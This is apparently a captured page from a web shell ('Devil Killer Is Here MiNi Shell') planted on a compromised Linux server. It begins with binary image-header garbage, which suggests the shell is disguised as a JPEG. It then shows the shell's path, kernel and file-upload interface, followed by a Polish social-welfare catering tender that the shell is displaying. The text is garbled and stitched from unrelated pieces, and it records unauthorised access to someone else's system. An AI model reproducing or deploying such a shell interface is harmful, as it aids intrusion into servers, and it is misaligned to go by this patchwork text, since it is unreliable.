JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251118/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251118/0053981401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług przygotowania, dostarczania i wydawania posiłków dla uczestników Centrum Opiekuńczo–Mieszkalnego oraz osób wskazanych przez Ośrodek Pomocy Społecznej od 01.01.2026 do 31.12.2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OŚRODEK POMOCY SPOŁECZNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830454610</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Majdan Królewski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158471046</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">158471890</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ops@majdankrolewski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://majdankrolewski.naszops.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług przygotowania, dostarczania i wydawania posiłków dla uczestników Centrum Opiekuńczo–Mieszkalnego oraz osób wskazanych przez Ośrodek Pomocy Społecznej od 01.01.2026 do 31.12.2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9b4037d-b7dd-498e-bdfa-4db3f54c1d8a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00539814</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b9b4037d-b7dd-498e-bdfa-4db3f54c1d8a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b9b4037d-b7dd-498e-bdfa-4db3f54c1d8a</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformy: https://ezamowienia.gov.pl.<br/>2)	Wykonawca musi posiadać konto typu „Wykonawca” na platformie e-Zamówienia. Szczegóły dotyczące zakładania kont i korzystania z platformy znajdują się w Regulaminie Platformy e-Zamówienia oraz w zakładce „Centrum Pomocy” na stronie platformy.<br/>3)	Szczegółowe instrukcje dotyczące składania ofert, wniosków i komunikacji dostępne są w Instrukcji użytkownika platformy e-Zamówienia.<br/>4)	Maksymalny rozmiar przesyłanych plików: 150 MB.<br/>5)	Dopuszczalne formaty plików: .pdf, .doc, .docx, .xls, .xlsx, .jpg. Dokumenty mogą być skompresowane w formatach .zip lub .7z. Inne formaty plików nie będą akceptowane.<br/>6)	Stały dostęp do Internetu o minimalnej przepustowości: 512 kb/s.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 i art.14 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Ośrodek Pomocy Społecznej w Majdanie Królewskim, ul. Rynek 1A, 36-110 Majdan Królewski zwany również zamawiającym<br/>2)	administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować pod adresem e-mail: jakubsmykla@hebenpolska.pl; tel.882 491 546 <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym <br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 i art. 74 ustawy PZP. <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>7)	Po ustaniu celu pierwotnego dane będą przetwarzane w celach archiwalnych ,kontrolnych na podstawie art.6 ust 1 lit.c RODO w związku. z właściwymi przepisami szczególnymi.<br/>8)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.OPS.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług przygotowania, dostarczania oraz wydawania posiłków (usługa cateringowa) dla:<br/>a)	uczestników Centrum Opiekuńczo– Mieszkalnego w Brzostowej Górze, prowadzonego przez OPS, (planowana liczba dożywianych uczestników: około 18 osób pobyt dzienny/dni robocze, 2 osoby – pobyt całodobowy/wszystkie dni w roku) w okresie:<br/>a.	dla uczestników COM pobyt dzienny w okresie od 01.01.2026 r. do 31.12.2026 r., tj. około 251 dni roboczych,<br/>b.	dla uczestników COM pobyt całodobowy w okresie od 01.01.2026r. do 31.12.2026r., tj. około 365 dni w roku<br/>b)	osób wskazanych przez Ośrodek Pomocy Społecznej w Majdanie Królewskim, którym przyznano pomoc w formie posiłku na podstawie decyzji administracyjnych, (planowana liczba dożywianych około 16 osób średnio miesięcznie - dowóz do ich miejsc zamieszkania na terenie gminy/dni robocze) w okresie: od 01.01.2026 r. do 31.12.2026 r., w dni robocze tj. około 251 dni roboczych.<br/>2.	Usługa obejmuje w szczególności:<br/>a)	przygotowanie posiłków zgodnie z obowiązującymi normami żywieniowymi i sanitarno–higienicznymi,<br/>b)	dostarczenie posiłków w termosach do wskazanych miejsc,<br/>c)	wydanie lub przekazanie posiłków odbiorcom,<br/>3.	Miejsca dostarczania posiłków:<br/>a)	siedziba Centrum Opiekuńczo– Mieszkalnego w Brzostowej Górze, Brzostowa Góra 110, 36-110 Majdan Królewski<br/>b)	miejsca zamieszkania osób uprawnionych lub inne lokalizacje wskazane przez OPS - zakres terytorialny świadczenia usług obejmuje teren Gminy Majdan Królewski. Wykonawca będzie zobowiązany do dostarczania posiłków do miejsc wskazanych przez Zamawiającego na obszarze gminy, zgodnie z bieżącymi potrzebami wynikającymi z przyznanej pomocy <br/>4.	Dostawy posiłków ,odbywać się będą odpowiednio:<br/>a)	dla uczestników COM :<br/>a.	dostawa śniadania w godzinach od 8:30 - 9:00<br/>b.	dostawa obiadu w godzinach od 13:00 – 13:30<br/>c.	dostawa kolacji w godzinach od 17:00 – 17:30<br/>b)	dla osób wskazanych przez OPS z transportem do ich miejsc zamieszkania na terenie gminy:<br/>a.	dostawa obiadu w godzinach od 13:00 do 15:00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55521000-8 - Usługi w zakresie dostarczania posiłków do prywatnych gospodarstw domowych</p> <p class="mb-0">55523000-2 - Usługi zaprowiantowania innych przedsiębiorstw lub instytucji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od miejsca przygotowania/wytwarzania posiłków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	Posiadania uprawnień do prowadzenia działalności gospodarczej lub zawodowej w zakresie przygotowywania i dostarczania posiłków, zgodnie z art. 63 ust. 1 ustawy o bezpieczeństwie żywności i żywienia (Dz.U. z 2023 r., poz. 1448), tj. posiadania decyzji o zatwierdzeniu lub warunkowym zatwierdzeniu zakładu albo wpisu do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, dotyczących zakładu (kuchni), w którym będą przygotowywane posiłki przeznaczone do realizacji zamówienia.<br/>2)	Sytuacji finansowej lub ekonomicznej<br/>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny<br/>3)	Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunki, jeżeli wykaże że :<br/>a.	Posiadanie niezbędnej wiedzy i doświadczenia zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej jedną usługę polegającą na przygotowaniu i dostarczaniu posiłków dla osób starszych, chorych lub z niepełnosprawnościami, świadczoną przez okres co najmniej 12 kolejnych miesięcy dla grupy minimum 20 osób.<br/>Zamawiający dopuszcza sumowanie okresów realizacji umów będących wynikiem zamówień publicznych lub cywilnoprawnych, realizowanych na rzecz jednego lub więcej zamawiających/właścicieli zlecenia, w celu spełnienia wymaganego okresu doświadczenia.<br/>Na potwierdzenie wykonawca przedkłada wykaz usług zawierający daty, miejsca wykonania oraz podmioty, na rzecz których usługi zostały zrealizowane, wraz z dowodami należytego wykonania (referencje lub inne dokumenty potwierdzające należyte wykonanie; w przypadku usług ciągłych – należyte wykonywanie).<br/>b.	Posiadania narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia:<br/>•	Wykonawca musi dysponować kuchnią dopuszczoną do przygotowywania posiłków w żywieniu zbiorowym, posiadającą decyzję o zatwierdzeniu lub warunkowym zatwierdzeniu zakładu albo wpis do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej, dotyczącą kuchni, w której będą przygotowywane posiłki na potrzeby realizacji zamówienia.<br/>•	Wykonawca musi posiadać tytuł prawny do korzystania z kuchni (np. własność, najem, użyczenie).<br/>•	Kuchnia musi być wyposażona w niezbędne urządzenia do przygotowywania, porcjowania i utrzymania odpowiedniej temperatury posiłków.<br/>•	Wykonawca musi dysponować co najmniej jednym środkiem transportu przystosowanym do przewozu posiłków, umożliwiającym zachowanie wymogów higieniczno–sanitarnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>a)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. 2021 poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub in-formacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej wraz z oświadczeniem o aktualności informacji zawartych w Oświadczeniu o niepodleganiu wykluczeniu złożonym wraz z ofertą – zgodnie z wzorem stanowiącym Załącznik nr 11 do SWZ;<br/>b)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; (Zamawiają-cy nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących Zdolności do prowadzenia określonej działalności gospodarczej lub zawodowej Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a)	aktualna na dzień składania ofert decyzja o zatwierdzeniu zakładu albo decyzja o warunkowym zatwierdzeniu zakładu, albo zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej – zgodnie z art. 63 ust. 1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. z 2023 r. poz. 1448) – dotyczące zakładu (kuchni), w którym będą przygotowywane posiłki na potrzeby realizacji zamówienia..<br/>2)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących podmiotowych środków dowodowych: <br/>a)	Doświadczenie - Wykonawca składa:<br/>a.	wykaz usług, z którego wynika, że:<br/>•	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>•	wykonał lub wykonuje co najmniej jedną usługę polegającą na przygotowaniu i dostarczaniu posiłków<br/>•	dla osób starszych, chorych lub z niepełnosprawnościami,<br/>•	świadczoną przez co najmniej 12 kolejnych miesięcy,<br/>•	dla grupy minimum 20 osób.<br/>Wykaz należy sporządzić zgodnie z Załącznikiem nr 4. wraz z dowodami należytego wykonania usług, w szczególności: referencje, inne dokumenty potwierdzające należyte wykonanie, a w przypadku usług ciągłych – dokumenty potwierdzające ich należyte wykonywanie.<br/>b)	Zaplecze techniczne (kuchnia, wyposażenie, transport) - Wykonawca składa:<br/>a.	kopię decyzji o zatwierdzeniu lub warunkowym zatwierdzeniu zakładu albo zaświadczenia o wpisie do rejestru zakładów podlegających kontroli Państwowej Inspekcji Sanitarnej – dotyczących kuchni, w której będą przygotowywane posiłki na potrzeby realizacji zamówienia;<br/>b.	wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy, obejmujący w szczególności:<br/>•	urządzenia kuchenne,<br/>•	sprzęt do przygotowywania i porcjowania posiłków,<br/>•	urządzenia umożliwiające utrzymanie temperatury <br/>c.	oświadczenie wykonawcy o posiadaniu tytułu prawnego do kuchni, z której będzie korzystał przy realizacji zamówienia (np. własność, najem, użyczenie).<br/>d.	wykaz środków transportu przeznaczonych do przewozu posiłków wraz z opisem ich przystosowania do zachowania wymogów higieniczno–sanitarnych</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z art. 121 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2023 r. poz. 1823 ze zm.), w przypadku, gdy Zamawiający dopuszcza możliwość wspólnego ubiegania się o zamówienie przez kilku Wykonawców, zastrzega się, że:<br/>a.	Zamówienie będzie realizowane wyłącznie przez jednego Wykonawcę, który zostanie wyznaczony jako lider konsorcjum lub podmiot wiodący.<br/>b.	Lider konsorcjum ponosi pełną odpowiedzialność za prawidłową i terminową realizację przedmiotu zamówienia, w tym świadczenie usług przygotowania, dostarczania i wydawania posiłków uczestnikom COM oraz osobom wskazanym przez OPS zgodnie z wymaganiami SWZ i umowy.<br/>c.	Pozostali Wykonawcy uczestniczący w konsorcjum lub wspólnym ubieganiu się o zamówienie pełnią wyłącznie rolę wspierającą i nie są uprawnieni do samodzielnego wykonywania przedmiotu zamówienia.<br/>d.	Oferta składana przez Wykonawców wspólnie ubiegających się o zamówienie musi zawierać:<br/>a) jednoznaczne wskazanie Wykonawcy pełniącego funkcję lidera;<br/>b) dokument potwierdzający zakres odpowiedzialności lidera oraz jego kompetencje do wykonania zamówienia;<br/>c) oświadczenie wszystkich członków konsorcjum o akceptacji powyższych zasad i zobowiązaniu do współpracy w ramach konsorcjum.<br/>b)	Naruszenie powyższych zasad skutkować będzie odrzuceniem oferty jako niespełniającej wymagań SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 